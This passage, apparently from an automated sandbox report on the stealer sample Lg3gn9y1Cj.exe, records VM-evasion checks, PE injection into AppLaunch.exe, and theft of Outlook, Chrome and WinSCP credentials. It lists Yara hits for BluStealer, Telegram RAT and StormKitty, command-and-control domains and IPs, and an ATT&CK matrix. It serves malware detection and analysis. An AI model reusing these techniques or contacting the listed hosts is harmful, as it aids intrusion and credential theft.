                Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System\spoolsv.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exe TID: 916Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5140Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1404Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System\explorer.exe TID: 5244Thread sleep count: 359 > 30Jump to behavior
                Source: C:\Windows\System\svchost.exe TID: 784Thread sleep count: 66 > 30Jump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 4216Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System\explorer.exeWindow / User API: threadDelayed 359Jump to behavior
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeAPI coverage: 3.2 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                Source: C:\Windows\System\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\mrsys.exeJump to dropped file
                Source: C:\Windows\System\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\stsys.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: svchost.exe, 00000027.00000002.537976090.000001E1CF665000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
                Source: svchost.exe, 0000000E.00000002.529653388.0000024224802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                Source: svchost.exe, 00000027.00000002.532624727.000001E1CA029000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.537883758.000001E1CF658000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 0000000E.00000002.531319269.0000024224840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.532432595.0000018D6C440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.532026229.0000018338C29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\System\explorer.exeDomain query: vccmd01.googlecode.com
                Source: C:\Windows\System\explorer.exeDomain query: vccmd02.googlecode.com
                Source: C:\Windows\System\explorer.exeNetwork Connect: 51.81.194.202 443Jump to behavior
                Source: C:\Windows\System\explorer.exeDomain query: zxq.net
                Source: C:\Windows\System\explorer.exeDomain query: vccmd01.zxq.net
                Source: C:\Windows\System\explorer.exeDomain query: vccmd03.googlecode.com
                Source: C:\Windows\System\explorer.exeDomain query: vccmd01.t35.com
                Source: C:\Windows\System\explorer.exeNetwork Connect: 142.250.145.82 80Jump to behavior
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 5320000 protect: page execute and read and writeJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 5320000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 5320000Jump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 503F008Jump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeCode function: 0_2_0041E9D0 __vbaChkstk,__vbaOnError,#525,__vbaStrMove,__vbaLenBstr,__vbaStrToAnsi,GetUserNameA,__vbaStrToUnicode,__vbaFreeStr,#537,__vbaStrMove,__vbaInStr,#616,__vbaStrMove,__vbaFreeStr,__vbaFreeStr,__vbaErrorOverflow,0_2_0041E9D0

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Changes security center settings (notifications, updates, antivirus, firewall)
                Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                Source: svchost.exe, 0000002E.00000002.532484937.000001B3C3F02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                Stealing of Sensitive Information

                barindex
                Yara detected BluStealer
                Source: Yara matchFile source: Process Memory Space: lg3gn9y1cj.exe PID: 4392, type: MEMORYSTR
                Yara detected Telegram RAT
                Source: Yara matchFile source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: lg3gn9y1cj.exe PID: 4392, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 5840, type: MEMORYSTR
                Yara detected StormKitty Stealer
                Source: Yara matchFile source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: lg3gn9y1cj.exe PID: 4392, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 5840, type: MEMORYSTR
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Source: Yara matchFile source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.277724010.000000000733B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.277673083.00000000072F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: lg3gn9y1cj.exe PID: 4392, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 5840, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected BluStealer
                Source: Yara matchFile source: Process Memory Space: lg3gn9y1cj.exe PID: 4392, type: MEMORYSTR
                Yara detected Telegram RAT
                Source: Yara matchFile source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: lg3gn9y1cj.exe PID: 4392, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 5840, type: MEMORYSTR
                Yara detected StormKitty Stealer
                Source: Yara matchFile source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: lg3gn9y1cj.exe PID: 4392, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 5840, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts131
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                Account Discovery                		Remote Services11
                Archive Collected Data                		Exfiltration Over Other Network Medium3
                Ingress Tool Transfer                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Scheduled Task/Job                		11
                Windows Service                		11
                Windows Service                		11
                Deobfuscate/Decode Files or Information                		121
                Input Capture                		1
                File and Directory Discovery                		Remote Desktop Protocol1
                Data from Local System                		Exfiltration Over Bluetooth11
                Encrypted Channel                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts1
                Service Execution                		1
                Scheduled Task/Job                		411
                Process Injection                		3
                Obfuscated Files or Information                		1
                Credentials in Registry                		44
                System Information Discovery                		SMB/Windows Admin Shares1
                Email Collection                		Automated Exfiltration3
                Non-Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)1
                Registry Run Keys / Startup Folder                		1
                Scheduled Task/Job                		11
                Software Packing                		NTDS1
                Query Registry                		Distributed Component Object Model121
                Input Capture                		Scheduled Transfer14
                Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon Script1
                Registry Run Keys / Startup Folder                		1
                DLL Side-Loading                		LSA Secrets251
                Security Software Discovery                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                File Deletion                		Cached Domain Credentials1
                Process Discovery                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items231
                Masquerading                		DCSync151
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job151
                Virtualization/Sandbox Evasion                		Proc Filesystem1
                Application Window Discovery                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)411
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                Remote System Discovery                		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture1
                System Network Configuration Discovery                		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 679096 Sample: Lg3gn9y1Cj.exe Startdate: 05/08/2022 Architecture: WINDOWS Score: 100 93 Potential malicious icon found 2->93 95 Malicious sample detected (through community Yara rule) 2->95 97 Antivirus detection for dropped file 2->97 99 10 other signatures 2->99 11 Lg3gn9y1Cj.exe 1 4 2->11         started        15 explorer.exe 2->15         started        17 svchost.exe 2->17         started        19 8 other processes 2->19 process3 dnsIp4 71 C:\Users\user\Desktop\lg3gn9y1cj.exe, PE32 11->71 dropped 73 C:\Users\user\AppData\Local\icsys.icn.exe, PE32 11->73 dropped 131 Installs a global keyboard hook 11->131 22 icsys.icn.exe 3 11->22         started        27 lg3gn9y1cj.exe 1 11->27         started        133 Changes security center settings (notifications, updates, antivirus, firewall) 17->133 79 127.0.0.1 unknown unknown 19->79 file5 signatures6 process7 dnsIp8 81 192.168.2.1 unknown unknown 22->81 67 C:\Windows\System\explorer.exe, PE32 22->67 dropped 109 Antivirus detection for dropped file 22->109 111 Machine Learning detection for dropped file 22->111 113 Drops executables to the windows directory (C:\Windows) and starts them 22->113 121 2 other signatures 22->121 29 explorer.exe 3 20 22->29         started        115 Writes to foreign memory regions 27->115 117 Allocates memory in foreign processes 27->117 119 Injects a PE file into a foreign processes 27->119 34 AppLaunch.exe 15 3 27->34         started        file9 signatures10 process11 dnsIp12 83 vccmd01.zxq.net 51.81.194.202, 443, 49764, 49766 OVHFR United States 29->83 85 zxq.net 29->85 91 5 other IPs or domains 29->91 75 C:\Windows\System\spoolsv.exe, PE32 29->75 dropped 77 C:\Users\user\AppData\Roaming\mrsys.exe, PE32 29->77 dropped 137 Antivirus detection for dropped file 29->137 139 System process connects to network (likely due to code injection or exploit) 29->139 141 Creates an undocumented autostart registry key 29->141 149 3 